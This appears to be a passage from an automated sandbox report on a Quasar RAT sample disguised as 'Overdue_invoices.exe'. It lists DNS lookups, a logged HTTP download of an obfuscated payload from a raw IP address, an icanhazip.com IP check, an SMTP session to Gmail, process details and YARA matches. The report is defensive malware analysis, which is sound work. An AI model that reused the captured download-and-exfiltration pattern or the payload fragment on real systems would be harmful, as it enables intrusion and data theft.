                                                    Jan 27, 2021 15:15:47.953027964 CET53612928.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:49.358304024 CET6361953192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:49.408313036 CET53636198.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:52.124368906 CET6493853192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:52.182889938 CET53649388.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:58.839375019 CET6194653192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:58.892306089 CET53619468.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:59.284389019 CET6491053192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:59.356594086 CET53649108.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:16:31.815749884 CET5212353192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:16:31.868911982 CET53521238.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:45.547363043 CET5613053192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:45.599982023 CET53561308.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:46.340441942 CET5633853192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:46.397635937 CET53563388.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:47.228116035 CET5942053192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:47.276123047 CET53594208.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:47.761641979 CET5878453192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:47.818156958 CET53587848.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:48.401642084 CET6397853192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:48.458431005 CET53639788.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:49.186873913 CET6293853192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:49.246486902 CET53629388.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:50.100492954 CET5570853192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:50.158314943 CET53557088.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:51.257319927 CET5680353192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:51.313844919 CET53568038.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:52.705760002 CET5714553192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:52.753576040 CET53571458.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:17:53.337014914 CET5535953192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:17:53.398622990 CET53553598.8.8.8192.168.2.3

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 27, 2021 15:15:12.852633953 CET192.168.2.38.8.8.80x90afStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.931613922 CET192.168.2.38.8.8.80xed11Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:13.925585985 CET192.168.2.38.8.8.80xbd5cStandard query (0)icanhazip.comA (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:15.898952007 CET192.168.2.38.8.8.80xcc74Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 27, 2021 15:15:12.915644884 CET8.8.8.8192.168.2.30x90afNo error (0)raw.githubusercontent.comgithub.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET8.8.8.8192.168.2.30x90afNo error (0)github.map.fastly.net151.101.0.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET8.8.8.8192.168.2.30x90afNo error (0)github.map.fastly.net151.101.64.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET8.8.8.8192.168.2.30x90afNo error (0)github.map.fastly.net151.101.128.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.915644884 CET8.8.8.8192.168.2.30x90afNo error (0)github.map.fastly.net151.101.192.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET8.8.8.8192.168.2.30xed11No error (0)raw.githubusercontent.comgithub.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET8.8.8.8192.168.2.30xed11No error (0)github.map.fastly.net151.101.0.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET8.8.8.8192.168.2.30xed11No error (0)github.map.fastly.net151.101.64.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET8.8.8.8192.168.2.30xed11No error (0)github.map.fastly.net151.101.128.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:12.987937927 CET8.8.8.8192.168.2.30xed11No error (0)github.map.fastly.net151.101.192.133A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:13.984045029 CET8.8.8.8192.168.2.30xbd5cNo error (0)icanhazip.com147.75.47.199A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:13.984045029 CET8.8.8.8192.168.2.30xbd5cNo error (0)icanhazip.com136.144.56.255A (IP address)IN (0x0001)
                                                    Jan 27, 2021 15:15:15.972109079 CET8.8.8.8192.168.2.30xcc74No error (0)smtp.gmail.com108.177.119.109A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • 193.239.147.103
                                                    • icanhazip.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.349721193.239.147.10380C:\Users\user\Desktop\Overdue_invoices.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 27, 2021 15:15:04.125174999 CET72OUTGET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1
                                                    Host: 193.239.147.103
                                                    Connection: Keep-Alive
                                                    Jan 27, 2021 15:15:04.173216105 CET73INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Wed, 27 Jan 2021 14:15:04 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 439235
                                                    Last-Modified: Tue, 26 Jan 2021 23:18:44 GMT
                                                    Connection: keep-alive
                                                    Vary: Accept-Encoding
                                                    ETag: "6010a354-6b3c3"
                                                    X-Frame-Options: SAMEORIGIN
                                                    Accept-Ranges: bytes
                                                    Data Raw: 3c 70 3e 54 54 51 69 50 51 78 77 77 51 50 51 6e 51 50 51 50 51 50 51 77 51 50 51 50 51 50 51 46 65 65 51 46 65 65 51 50 51 50 51 78 41 77 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 4b 77 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 78 46 41 51 50 51 50 51 50 51 78 77 51 6e 78 51 78 41 4b 51 78 77 51 50 51 78 41 50 51 69 51 46 50 65 51 6e 6e 51 78 41 77 51 78 51 54 4b 51 46 50 65 51 6e 6e 51 41 77 51 78 50 77 51 78 50 65 51 78 78 65 51 6e 46 51 78 78 46 51 78 78 77 51 78 78 78 51 78 50 6e 51 78 78 77 51 69 54 51 78 50 69 51 6e 46 51 69 69 51 69 54 51 78 78 50 51 78 78 50 51 78 78 78 51 78 78 4b 51 6e 46 51 69 41 51 78 50 78 51 6e 46 51 78 78 77 51 78 78 54 51 78 78 50 51 6e 46 51 78 50 65 51 78 78 50 51 6e 46 51 4b 41 51 54 69 51 41 6e 51 6e 46 51 78 50 69 51 78 78 78 51 78 50 50 51 78 50 78 51 77 4b 51 78 6e 51 78 6e 51 78 50 51 6e 4b 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 41 50 51 4b 69 51 50 51 50 51 54 4b 51 78 51 6e 51 50 51 41 46 51 78 4b 6e 51 78 4b 51 69 4b 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 46 46 77 51 50 51 6e 77 51 50 51 78 78 51 78 51 41 50 51 50 51 50 51 46 77 50 51 78 51 50 51 50 51 4b 51 50 51 50 51 50 51 50 51 50 51 50 51 78 77 46 51 78 65 51 46 51 50 51 50 51 6e 46 51 50 51 50 51 50 51 6e 46 51 46 51 50 51 50 51 50 51 50 51 78 4b 51 50 51 6e 46 51 50 51 50 51 50 51 46 51 50 51 50 51 77 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 4b 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 69 4b 51 46 51 50 51 50 51 46 51 50 51 50 51 50 51 50 51 50 51 50 51 46 51 50 51 69 4b 51 78 6e 6e 51 50 51 50 51 78 4b 51 50 51 50 51 78 4b 51 50 51 50 51 50 51 50 51 78 4b 51 50 51 50 51 78 4b 51 50 51 50 51 50 51 50 51 50 51 50 51 78 4b 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 65 46 51 78 65 51 46 51 50 51 41 54 51 50 51 50 51 50 51 50 51 6e 46 51 46 51 50 51 41 41 51 6e 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 4b 77 51 46 51 50 51 78 46 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 6e 46 51 50 51 50 51 41 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 41 51 6e 46 51 50 51 50 51 54 46 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 77 4b 51 78 78 4b 51 78 50 78 51 78 46 50 51 78 78 4b 51 50 51 50 51 50 51 78 77 41 51 46 6e 69 51 78 51 50 51 50 51 6e 46 51 50 51 50 51 50 51 46 77 50 51 78 51 50 51 50 51 46 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 6e 46 51 50 51 50 51 69 4b 51 77 4b 51 78 78 77 51 78 78 65 51 78 78 77 51 69 69 51 50 51 50 51 50 51 41 41 51 6e 51 50 51 50 51 50 51 6e 46 51 46 51 50 51 50 51 77 51 50 51 50 51 50 51 46 77
                                                    Data Ascii: <p>TTQiPQxwwQPQnQPQPQPQwQPQPQPQFeeQFeeQPQPQxAwQPQPQPQPQPQPQPQKwQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQxFAQPQPQPQxwQnxQxAKQxwQPQxAPQiQFPeQnnQxAwQxQTKQFPeQnnQAwQxPwQxPeQxxeQnFQxxFQxxwQxxxQxPnQxxwQiTQxPiQnFQiiQiTQxxPQxxPQxxxQxxKQnFQiAQxPxQnFQxxwQxxTQxxPQnFQxPeQxxPQnFQKAQTiQAnQnFQxPiQxxxQxPPQxPxQwKQxnQxnQxPQnKQPQPQPQPQPQPQPQAPQKiQPQPQTKQxQnQPQAFQxKnQxKQiKQPQPQPQPQPQPQPQPQFFwQPQnwQPQxxQxQAPQPQPQFwPQxQPQPQKQPQPQPQPQPQPQxwFQxeQFQPQPQnFQPQPQPQnFQFQPQPQPQPQxKQPQnFQPQPQPQFQPQPQwQPQPQPQPQPQPQPQKQPQPQPQPQPQPQPQPQiKQFQPQPQFQPQPQPQPQPQPQFQPQiKQxnnQPQPQxKQPQPQxKQPQPQPQPQxKQPQPQxKQPQPQPQPQPQPQxKQPQPQPQPQPQPQPQPQPQPQPQeFQxeQFQPQATQPQPQPQPQnFQFQPQAAQnQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQKwQFQPQxFQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQnFQPQPQAQPQPQPQPQPQPQPQPQPQPQPQAQnFQPQPQTFQPQPQPQPQPQPQPQPQPQPQPQwKQxxKQxPxQxFPQxxKQPQPQPQxwAQFniQxQPQPQnFQPQPQPQFwPQxQPQPQFQPQPQPQPQPQPQPQPQPQPQPQPQPQPQnFQPQPQiKQwKQxxwQxxeQxxwQiiQPQPQPQAAQnQPQPQPQnFQFQPQPQwQPQPQPQFw
                                                    Jan 27, 2021 15:15:04.173243999 CET75INData Raw: 46 51 78 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 50 51 4b 77 51 50 51 50 51 4b 77 51 77 4b 51 78 78 77 51 78 50 78 51 78 50 41 51 78 78 78 51 69 69 51 50 51 50 51 78 46 51 50 51 50 51 50 51 50 51 4b 77 51 46 51
                                                    Data Ascii: FQxQPQPQPQPQPQPQPQPQPQPQPQPQPQKwQPQPQKwQwKQxxwQxPxQxPAQxxxQiiQPQPQxFQPQPQPQPQKwQFQPQPQFQPQPQPQFwKQxQPQPQPQPQPQPQPQPQPQPQPQPQPQKwQPQPQKKQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQPQxxFQxeQFQPQPQPQPQPQTFQPQPQPQFQPQeQPQKwQFPnQxQPQFwwQKTQPQPQnQPQFQPQxxwQPQPQK
                                                    Jan 27, 2021 15:15:04.173261881 CET76INData Raw: 50 51 78 50 51 78 78 65 51 78 50 50 51 50 51 50 51 78 50 51 77 46 51 46 4b 51 6e 46 51 50 51 50 51 50 51 50 51 77 46 51 46 4b 51 77 50 51 78 78 77 51 50 51 50 51 4b 51 77 46 51 50 51 50 51 46 54 51 77 41 51 46 51 50 51 78 54 77 51 50 51 50 51 50
                                                    Data Ascii: PQxPQxxeQxPPQPQPQxPQwFQFKQnFQPQPQPQPQwFQFKQwPQxxwQPQPQKQwFQPQPQFTQwAQFQPQxTwQPQPQPQxQPQPQxTQPQxxwQxQPQPQxxFQFewQxwQxQPQxxwQnxQPQPQxxFQFewQxwQFQPQxxeQFPQPQPQxPQFewQxwQnQPQFewQxFQxQPQwPQxQPQPQwnQxxxQFFQPQPQxPQFewQxwQwQPQeKQeKQPQPQPQFewQxnQwQPQwP
                                                    Jan 27, 2021 15:15:04.173279047 CET77INData Raw: 50 51 77 50 51 46 6e 51 50 51 50 51 78 50 51 46 65 77 51 78 77 51 65 51 50 51 46 65 77 51 78 46 51 65 51 50 51 77 50 51 46 77 51 50 51 50 51 78 50 51 46 65 77 51 78 46 51 46 51 50 51 77 50 51 46 65 51 50 51 50 51 78 50 51 46 78 41 51 46 65 77 51
                                                    Data Ascii: PQwPQFnQPQPQxPQFewQxwQeQPQFewQxFQeQPQwPQFwQPQPQxPQFewQxFQFQPQwPQFeQPQPQxPQFxAQFewQxwQKQPQFewQxFQnQPQFewQxFQKQPQwPQFKQPQPQxPQxxxQFTQPQPQxPQnAQPQFewQxnQwQPQwPQFAQPQPQxPQFewQxwQTQPQFewQxFQTQPQeAQxTAQFeeQFeeQFeeQFFxQxTQPQPQPQFewQxnQwQPQFewQFFQFQPQ
                                                    Jan 27, 2021 15:15:04.173307896 CET79INData Raw: 46 46 51 46 51 50 51 50 51 46 54 51 78 78 78 51 46 69 51 50 51 50 51 78 50 51 50 51 46 46 50 51 46 65 77 51 78 46 51 6e 51 50 51 78 78 78 51 6e 50 51 50 51 50 51 78 50 51 46 65 77 51 78 77 51 50 51 50 51 65 4b 51 50 51 50 51 50 51 50 51 46 65 77
                                                    Data Ascii: FFQFQPQPQFTQxxxQFiQPQPQxPQPQFFPQFewQxFQnQPQxxxQnPQPQPQxPQFewQxwQPQPQeKQPQPQPQPQFewQxFQPQPQwFQPQPQxQxKQPQPQFQPQFAQPQxPKQxnwQPQxTQPQPQPQPQFTQwAQFQPQxTwQPQPQPQxQPQPQxTQPQxxwQFPxQPQPQxxFQFewQxwQxQPQxxwQFxiQPQPQxxFQFewQxwQFQPQxxeQFPQPQPQxPQFewQxwQn
                                                    Jan 27, 2021 15:15:04.173325062 CET80INData Raw: 77 51 6e 51 50 51 46 65 77 51 78 46 51 78 51 50 51 77 50 51 78 51 50 51 50 51 77 6e 51 78 78 78 51 46 46 51 50 51 50 51 78 50 51 46 65 77 51 78 77 51 77 51 50 51 65 4b 51 65 4b 51 50 51 50 51 50 51 46 65 77 51 78 6e 51 77 51 50 51 77 50 51 46 6e
                                                    Data Ascii: wQnQPQFewQxFQxQPQwPQxQPQPQwnQxxxQFFQPQPQxPQFewQxwQwQPQeKQeKQPQPQPQFewQxnQwQPQwPQFnQPQPQxPQFewQxwQeQPQFewQxFQeQPQwPQFwQPQPQxPQFewQxFQFQPQwPQFeQPQPQxPQFxAQFewQxwQKQPQFewQxFQnQPQFewQxFQKQPQwPQFKQPQPQxPQxxxQFTQPQPQxPQnAQPQFewQxnQwQPQwPQFAQPQPQxPQF
                                                    Jan 27, 2021 15:15:04.173341036 CET82INData Raw: 78 50 51 46 65 77 51 78 77 51 54 51 50 51 46 65 77 51 78 46 51 54 51 50 51 65 41 51 78 54 41 51 46 65 65 51 46 65 65 51 46 65 65 51 46 46 78 51 78 54 51 50 51 50 51 50 51 46 65 77 51 78 6e 51 77 51 50 51 46 65 77 51 46 46 51 46 51 50 51 50 51 46
                                                    Data Ascii: xPQFewQxwQTQPQFewQxFQTQPQeAQxTAQFeeQFeeQFeeQFFxQxTQPQPQPQFewQxnQwQPQFewQFFQFQPQPQFTQxxxQFiQPQPQxPQPQFFPQFewQxFQnQPQxxxQnPQPQPQxPQFewQxwQPQPQeKQPQPQPQPQFewQxFQPQPQwFQPQPQxQxKQPQPQFQPQFAQPQxPKQxnwQPQxTQPQPQPQPQFTQwAQFQPQxTwQPQPQPQxQPQPQxTQPQxxwQ
                                                    Jan 27, 2021 15:15:04.173357964 CET83INData Raw: 51 50 51 78 78 77 51 78 69 54 51 78 51 50 51 78 78 46 51 46 65 77 51 78 77 51 78 51 50 51 78 78 77 51 46 6e 69 51 78 51 50 51 78 78 46 51 46 65 77 51 78 77 51 46 51 50 51 78 78 65 51 46 50 51 50 51 50 51 78 50 51 46 65 77 51 78 77 51 6e 51 50 51
                                                    Data Ascii: QPQxxwQxiTQxQPQxxFQFewQxwQxQPQxxwQFniQxQPQxxFQFewQxwQFQPQxxeQFPQPQPQxPQFewQxwQnQPQFewQxFQxQPQwPQxQPQPQwnQxxxQFFQPQPQxPQFewQxwQwQPQeKQeKQPQPQPQFewQxnQwQPQwPQFnQPQPQxPQFewQxwQeQPQFewQxFQeQPQwPQFwQPQPQxPQFewQxFQFQPQwPQFeQPQPQxPQFxAQFewQxwQKQPQFew
                                                    Jan 27, 2021 15:15:04.173374891 CET84INData Raw: 51 46 65 77 51 78 46 51 6e 51 50 51 46 65 77 51 78 46 51 4b 51 50 51 77 50 51 46 4b 51 50 51 50 51 78 50 51 78 78 78 51 46 54 51 50 51 50 51 78 50 51 6e 41 51 50 51 46 65 77 51 78 6e 51 77 51 50 51 77 50 51 46 41 51 50 51 50 51 78 50 51 46 65 77
                                                    Data Ascii: QFewQxFQnQPQFewQxFQKQPQwPQFKQPQPQxPQxxxQFTQPQPQxPQnAQPQFewQxnQwQPQwPQFAQPQPQxPQFewQxwQTQPQFewQxFQTQPQeAQxTAQFeeQFeeQFeeQFFxQxTQPQPQPQFewQxnQwQPQFewQFFQFQPQPQFTQxxxQFiQPQPQxPQPQFFPQFewQxFQnQPQxxxQnPQPQPQxPQFewQxwQPQPQeKQPQPQPQPQFewQxFQPQPQwFQPQ
                                                    Jan 27, 2021 15:15:04.173409939 CET86INData Raw: 46 51 50 51 50 51 78 51 78 4b 51 50 51 50 51 46 51 50 51 46 41 51 50 51 78 50 4b 51 78 6e 77 51 50 51 78 54 51 50 51 50 51 50 51 50 51 46 54 51 77 41 51 46 51 50 51 78 54 77 51 50 51 50 51 50 51 78 51 50 51 50 51 78 54 51 50 51 78 78 77 51 78 6e
                                                    Data Ascii: FQPQPQxQxKQPQPQFQPQFAQPQxPKQxnwQPQxTQPQPQPQPQFTQwAQFQPQxTwQPQPQPQxQPQPQxTQPQxxwQxneQFQPQxxFQFewQxwQxQPQxxwQxenQFQPQxxFQFewQxwQFQPQxxeQFPQPQPQxPQFewQxwQnQPQFewQxFQxQPQwPQxQPQPQwnQxxxQFFQPQPQxPQFewQxwQwQPQeKQeKQPQPQPQFewQxnQwQPQwPQFnQPQPQxPQFewQ
                                                    Jan 27, 2021 15:15:04.220325947 CET87INData Raw: 78 50 51 46 65 77 51 78 77 51 65 51 50 51 46 65 77 51 78 46 51 65 51 50 51 77 50 51 46 77 51 50 51 50 51 78 50 51 46 65 77 51 78 46 51 46 51 50 51 77 50 51 46 65 51 50 51 50 51 78 50 51 46 78 41 51 46 65 77 51 78 77 51 4b 51 50 51 46 65 77 51 78
                                                    Data Ascii: xPQFewQxwQeQPQFewQxFQeQPQwPQFwQPQPQxPQFewQxFQFQPQwPQFeQPQPQxPQFxAQFewQxwQKQPQFewQxFQnQPQFewQxFQKQPQwPQFKQPQPQxPQxxxQFTQPQPQxPQnAQPQFewQxnQwQPQwPQFAQPQPQxPQFewQxwQTQPQFewQxFQTQPQeAQxTAQFeeQFeeQFeeQFFxQxTQPQPQPQFewQxnQwQPQFewQFFQFQPQPQFTQxxxQFiQ


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.349734147.75.47.19980C:\Users\user\Desktop\Overdue_invoices.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 27, 2021 15:15:14.142913103 CET634OUTGET / HTTP/1.1
                                                    Host: icanhazip.com
                                                    Connection: Keep-Alive
                                                    Jan 27, 2021 15:15:14.300822020 CET635INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 27 Jan 2021 14:15:14 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 12
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET
                                                    x-rtfm: Learn about this site at http://bit.ly/icanhazip-faq and do not abuse the service.
                                                    x-node: icanhazip-dfw-1
                                                    x-donation: This site is expensive to run. You can donate BTC to 3LSp89k9qnMJBpV7AUNF3M2Eo1vatpkYpm
                                                    x-duck:
                                                    Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 34 0a
                                                    Data Ascii: 84.17.52.74


                                                    SMTP Packets

                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Jan 27, 2021 15:15:16.080607891 CET58749736108.177.119.109192.168.2.3220 smtp.gmail.com ESMTP y9sm1454236edi.74 - gsmtp
                                                    Jan 27, 2021 15:15:16.080883026 CET49736587192.168.2.3108.177.119.109EHLO 494126
                                                    Jan 27, 2021 15:15:16.134344101 CET58749736108.177.119.109192.168.2.3250-smtp.gmail.com at your service, [84.17.52.74]
                                                    250-SIZE 35882577
                                                    250-8BITMIME
                                                    250-STARTTLS
                                                    250-ENHANCEDSTATUSCODES
                                                    250-PIPELINING
                                                    250-CHUNKING
                                                    250 SMTPUTF8
                                                    Jan 27, 2021 15:15:16.134633064 CET49736587192.168.2.3108.177.119.109STARTTLS
                                                    Jan 27, 2021 15:15:16.186044931 CET58749736108.177.119.109192.168.2.3220 2.0.0 Ready to start TLS

                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: Overdue_invoices.exe PID: 5328 Parent PID: 5588

                                                    General

                                                    Start time:15:15:02
                                                    Start date:27/01/2021
                                                    Path:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\Overdue_invoices.exe'
                                                    Imagebase:0x400000
                                                    File size:100864 bytes
                                                    MD5 hash:AFA35EE8F27C8A6661219BCCB198FD9B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Author: Florian Roth
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: Overdue_invoices.exe PID: 6020 Parent PID: 5328

                                                    General

                                                    Start time:15:15:10
                                                    Start date:27/01/2021
                                                    Path:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\Overdue_invoices.exe
                                                    Imagebase:0xdb0000
                                                    File size:100864 bytes
                                                    MD5 hash:AFA35EE8F27C8A6661219BCCB198FD9B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                    Reputation:low

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: Overdue_invoices.exe PID: 5328 Parent PID: 5588 Overdue_invoices.exeCOMMON

                                                      Executed Functions

                                                      Function 00AD6C38, Relevance: .5, Instructions: 451COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 172fea99f5c797f60c08bea6a0c262c6739ccf9235562e1e76d78851fa3d85d5
                                                      • Instruction ID: 23e0f62178a2029460c117bf201001964b8bdca6e8de9a8c3a58f604c7f5d19e
                                                      • Opcode Fuzzy Hash: 172fea99f5c797f60c08bea6a0c262c6739ccf9235562e1e76d78851fa3d85d5
                                                      • Instruction Fuzzy Hash: 39026C70B002198FDB18DFA5C854BAEBBB6AF88344F25856AE506DB391DF34DD41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AD73B0, Relevance: .4, Instructions: 365COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6466a27cdb90436fc5b1a432cfa62dcb291c7c83569c3a3a393f92526aa95cd1
                                                      • Instruction ID: a71ff731a96e062953ca4aeb937da70a9a8463922abbec558833c6b51111a100
                                                      • Opcode Fuzzy Hash: 6466a27cdb90436fc5b1a432cfa62dcb291c7c83569c3a3a393f92526aa95cd1
                                                      • Instruction Fuzzy Hash: 6CE15A74A04119CFCB19CFA9D984AADBBB2FF88344F55846AE406AB361F730DD41CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AD5748, Relevance: .2, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbb0717fdf68e538827e780f0eb72435268d4534bfd9d9f466d07fbb1b648a4c
                                                      • Instruction ID: e5c408e4e88f3aecf3435f69bf3dfea09442a22727a2ab52734836e6d6d17910
                                                      • Opcode Fuzzy Hash: dbb0717fdf68e538827e780f0eb72435268d4534bfd9d9f466d07fbb1b648a4c
                                                      • Instruction Fuzzy Hash: 2451632180E3D05FDB03BB78A8707D63F719F53229F0A48E7D5818F6A3D6289819D766
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADCEA0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00ADD0D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 1ab8c869058a2f1f230037f1aa40bd1efd377632734bac8fa4f5baabb66433fe
                                                      • Instruction ID: 7117f1860fe0c6ee221f995b09152a0258287a4293bb95ba837310a73518cc56
                                                      • Opcode Fuzzy Hash: 1ab8c869058a2f1f230037f1aa40bd1efd377632734bac8fa4f5baabb66433fe
                                                      • Instruction Fuzzy Hash: C5915A71D00219DFDF10DFA5C8817EEBBB2BB48314F15856AE81AA7380DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00ADCE9D, Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00ADD0D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.230076133.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                      Similarity
